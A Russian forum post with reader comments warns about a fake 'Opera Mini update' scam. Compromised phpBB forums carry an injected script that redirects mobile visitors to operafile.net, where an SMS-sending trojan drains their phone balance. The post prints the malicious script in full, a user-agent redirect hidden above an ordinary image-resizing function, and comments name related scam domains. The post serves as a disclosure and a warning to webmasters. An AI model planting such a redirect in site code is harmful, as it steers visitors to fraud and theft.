Обновление Opera Mini — даже если она у вас не установлена

    Всем привет!
    Ваш мобильный друг просит обновить Оперу? Не верьте — это ложь! Будьте внимательны!
    Только что наткнулся на уязвимость в PHPBB. Где она кроется не знаю — но вот в чем она заключается. С помощью этой уязвимости, в движок вашего форума заливается или создается скрипт ca_scripts.js, я подозреваю, что называться он может как угодно. Чуть ниже, я его выложу.

    Суть его такова, когда пользователь заходит на ваш сайт, скрипт определяет операционную систему, с помощью функции navigator.userAgent.match. Если ваша операционная система подходит под следующий список:
    • android
    • midp
    • j2me
    • symbian
    • series 60
    • symbos
    • windows mobile
    • windows ce
    • ppc
    • smartphone
    • blackberry
    • mtk

    то он делает перенаправление на operafile.net и дописывает /u/[ID] (видимо ребята статистику ведут). Далее, сформируется предложение об обновление Opera Mini, даже если она у вас не установлена. После того, как вы скачаете обновление, очень похожее на установщик Opera — вы установите себе ПО, которое в фоновом режиме будет отсылать SMS на короткие номера, но не для того что бы вы выиграли Mercedes, а просто чтобы опустошить ваш счет.
    Если вы зайдете на сайт operafile.net — то вас перенаправит на google.com.

    Для web мастеров. Если вы прочитали этот пост, советую вам в вашем public «грепнуть» найти все скрипты, которые содержат домен operafile.net и другие (пока не знаю какие =) ), не известные вам домены. Либо проанализировать по дате.

    Вот сам скрипт

    var ca_item;
    var ca_item2;
    var ca_list;
    if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk)/i)!==null){
      window.location = "http://operafile.net/u/1013";
    }
    onload_functions[onload_functions.length] = 'ca_resize_images();';
    
    // resize images
    function ca_resize_images()
    {
        var i, limit, diff;
        limit = 600;
        diff = 225;
        ca_item = document.getElementById('contentrow');
        if(ca_item && ca_item.clientWidth)
        {
            limit = ca_item.clientWidth - diff;
        }
        if(limit < 500)
        {
            limit = 500;
        }
        if(document.body.clientWidth && document.body.clientWidth < (limit + diff) && document.body.clientWidth > 800)
        {
            limit = document.body.clientWidth - diff;
        }
        else if(window.innerWidth && window.innerWidth < (limit + diff) && window.innerWidth > 800)
        {
            limit = window.innerWidth - diff;
        }
        /* IE6 limit fix */
        if(!window.XMLHttpRequest && limit > 1500)
        {
            limit = 800;
        }
        if(ca_main_width && ca_main_width.indexOf('%') == -1)
        {
            ca_main_width.replace(/px/, '');
            if(ca_main_width > 0)
            {
                limit = ca_main_width - diff;
            }
        }
        if(ca_item)
        {
            ca_list = ca_item.getElementsByTagName('img');
        }
        else
        {
            ca_list = document.getElementsByTagName('img');
        }
        for(i=0; i<ca_list.length; i++)
        {
            ca_item = ca_list[i];
            if(ca_item.width > limit)
            {
                if(document.all) 
                { 
                    ca_item.style.cursor = 'hand'; 
                }
                else
                { 
                    ca_item.style.cursor = 'pointer'; 
                }
                ca_item.style.width = (limit - 50) + 'px';
                ca_item.onclick = function() { 
                    window.open(this.src, 'image', 'width=700,height=500,resizable=1,scrollbars=1');
                }
            }
        }
    }
    
    Ads
    AdBlock has stolen the banner, but banners are not teeth — they will be back

    More

    Comments 43

      +6
      Ой, зачем же так сурово? Лучше залейте код на paste in.
        +3
        Pastebin. Андроид, т9 :\
          +1
          Имя для стартапа, пока никто не видит, быстренько скопипипнул.
          +1
          >Если вы зайдете на сайт operafile.net — то вас перенаправит на google.com.

          На FF не перенаправляет…
            0
            Opera, Chrome, IE тоже :)
              +2
              На Хроме под W7 x64 предлагают скачать .jar. Имеется грамотный User Agreement, по которому кликатель — сам себе злобный буратино.
              0
              Ubuntu: Chrome, FF — редирект работает.
              0
              Что толку об этом писать, если сделать ничего нельзя.
                +5
                Можно. Обратиться в поддержку сотового оператора. Они занимаются борьбой с СМС фродом.
                  +1
                  Фрод это когда смс-ки при минусе отправляются и услуга оказывается без оплаты, тоесть это совсем другое.
                  А служба поддержки тут не поможет, свалит все на соглашение.
                    0
                    Греха таить не буду — стал жертвой operabest.net. Просто на автомате «обновил», уставший был, невнимательный. Сам виноват, конечно. Написал заявки в биллинг и оператору. Мегафон мне помог.
                    Так или иначе эта бизнес-модель не честная и за такое надо бы шею организаторам пожимать.
                      0
                      Кстати, да! Я удивляюсь читая комменты, когда людям вообще что-то возвратили.
                      +1
                      Я несколько раз кидал опсосовским СБ и длинные и короткие номера(«киньте денег» или подобное)

                      сам давно сделал проще
                      >Текущие услуги:
                      >>Подключены дополнительные услуги:
                      >>>Запрет вызовов на платные короткие номера

                      опсос мегафон
                      0
                      Стоп стоп стоп. Что толку? Во-первых, если вы сам webmaster и нашли у себя подобную вещь, то вы можете устранить это. Если вы заметили это на ресурсе, который вы часто посещаете — вы можете предупредить webmaster-a ресурса и направить на правильный путь. Как то так.
                    • UFO just landed and posted this here
                        0
                        Дело не в лицухах, они для отвода глаз.
                        Жаловаться некуда. Оператору? Да он в доле, ему выгодно.
                        Биллингу? Он тоже в доле. В органы? Чего уж таить, им тоже отсыпают.
                          0
                          Для вас эта жалоба будет всего-лишь e-mail'ом нескольким адресатам. И кто-нибудь из этой цепочки среагирует
                        +1
                        mobimp3.net/agreement

                        7. В случае обнаружения спама или иных запрещенных методов распространения приложений для оплаты доступа к сервису mobimp3.net, Администрация просит уведомлять о таких случаях в Службу поддержки Абонентов: mobiask@gmail.com.
                          +1
                          при заходе на половину сайтов ucoz с мобильных устройств тоже перекидывает на всякие разные «обновления оперы»
                            0
                            Да ну что вы вот не бывает такой неделе чтоб 1-2 раза меня после перехода с поискс кидает на скачку оперы притом ява на мой айфон, звбейте, как на такое купиться можно?
                              0
                              Не в обиду, но мозг сломал, пока прочитал Ваше предложение.
                              +1
                              DrWeb однозначно определяет, как вирус — sms.class infected with Java.SMSSend.770.
                              Virustotal.

                              А вообще в таких случаях нужно сразу писать абузы хостерам таких сайтов. Помогает, если это какой-нибудь Хецнер. Но иногда в ответ тишина.
                                +1
                                На случай, если здесь кто-нибудь знает контакты нынешнего владельца vpleer.ru — передайте ему, что на сайте уже минимум полгода сидит троян.

                                Попробуйте запросить en.vpleer.ru с юзерагентом Оперы-мини.

                                Естественные способы (форма на сайте и служеные почтовые адреса) не сработали.
                                  +2
                                  сам же и поставил
                                0
                                Я буквально на той неделе попался. Приехали кататься на горных лыжах, но немного опоздали и кассы уже закрывались (склоны еще работали). Второпях стал смотреть в интернете куда бы можно было ещё поехать и не читая щелкнул «Ок». Опера и «обновилась»… Сожрало почти 200 рублей.
                                Обидно потом было просто трындец как :(
                                +1
                                Ну, честно говоря, не ново.
                                Уже давно на многих взломанных сайтах стоят редиректы на подобные вещи.
                                Если решили проверить свой сайт, загляните в htaccess.Чаще всего именно там находится вредоносный код.
                                «прикрывать» подобную лавочку, на настоящий момент, никто не будет.Все абсолютно легально, со стороны закона.Разве что у большой троицы проснется совесть, но это, как понимаете, маловероятно.
                                  +1
                                  Тоже не понял смысла данного поста. Теме не первый год уже.
                                  Таких сайтов тысячи, скриптов сотни. Людей этим промышляющих тоже не мало. Каждый день писать об очередной сотне найденных сайтов предлагающем обновить браузер или вылечить вирусы?

                                  А вэбмастерам, до которых ТС пробует достучаться. Нужно предлагать не искать этот же JS файл (их реально сотни). А намекнуть посмотреть в сторону в политики создания/изменения файлов на их серверах или хотя бы отслеживании изменённых файлов.
                                  –1
                                  Попадался на похожую схему. Влетел на 500р. Оператор — биллайн. Деньги удалось вернуть не через биллайн, а через эту калофирму, которая у меня их сняла. Биллайн бессильно разводил руками — «не мы у вас снимали деньги». Сволота вообщем =(
                                    +1
                                    БиЛЛайн — глаза режет. Правильно билайн или же beeline.
                                      –1
                                      Спасибо за замечание! Наверное сказывается то, что хочется хоть какую-то букву написать дважды :-) как в bEEline
                                    0
                                    Как только у меня появился HTC, я сразу столкнулся с «Срочно обновите Opera». И не только на сайтах! Они рекламу покупают, в том числе и в Angry Birds.
                                      0
                                      Для меня этой проблемы нет, просто потому, что перейдя на андроид и подключив анлим + настала эпоха быстрого 3G, потребность в опере отпала.

                                      А значит все эти сайты + баннеры в половине бесплатный программ из маркета — 100% развод.
                                        0
                                        Да-да, теперь в моде реклама «Ваша версия Skype устарела. Обновите. пожалуйста.»
                                        0
                                        Меняйте useragent в своих браузерах на десктопный.
                                          0
                                            0
                                            так же на этом IP хостятся:

                                            mobieros.net
                                            mobvideo.net
                                            operanew.net
                                              0
                                              тоже недавно попался на похожую штуку. нажал случайно на рекламу и не глядя установил. были отправлены 3 смски стоимостью 600р. незамедлительно позвонил оператору МТС, прикинулся тюленем, типа ни при чем, и через 1,5 суток деньги вернулись почти в полном объеме. так и не понял, почему почти… вернулось только 500р. из 600р.
                                                0
                                                Похоже МТС тоже прикинулись тюленями = )
                                                0
                                                Подобное я встречал на сайте bash.clan.su, когда башорг еще не давал читать себя с оперы мини. Спасло меня то, что у меня была установлена версия 6.1, а обновиться предлагали до 6.0. Написали бы версию выше — попался бы.
                                                  0
                                                  Да, попадал я тоже в эту ситуацию на Bada'вском браузере.
                                                    0
                                                    я вам тайну открою — на множестве сайтов такие скрипты не результат взлома, а результат жлобства вебмастеров. Так как существуют куча «партнерок» которые предлагают монетизацию мобильного трафика

                                                    Only users with full accounts can post comments. Log in, please.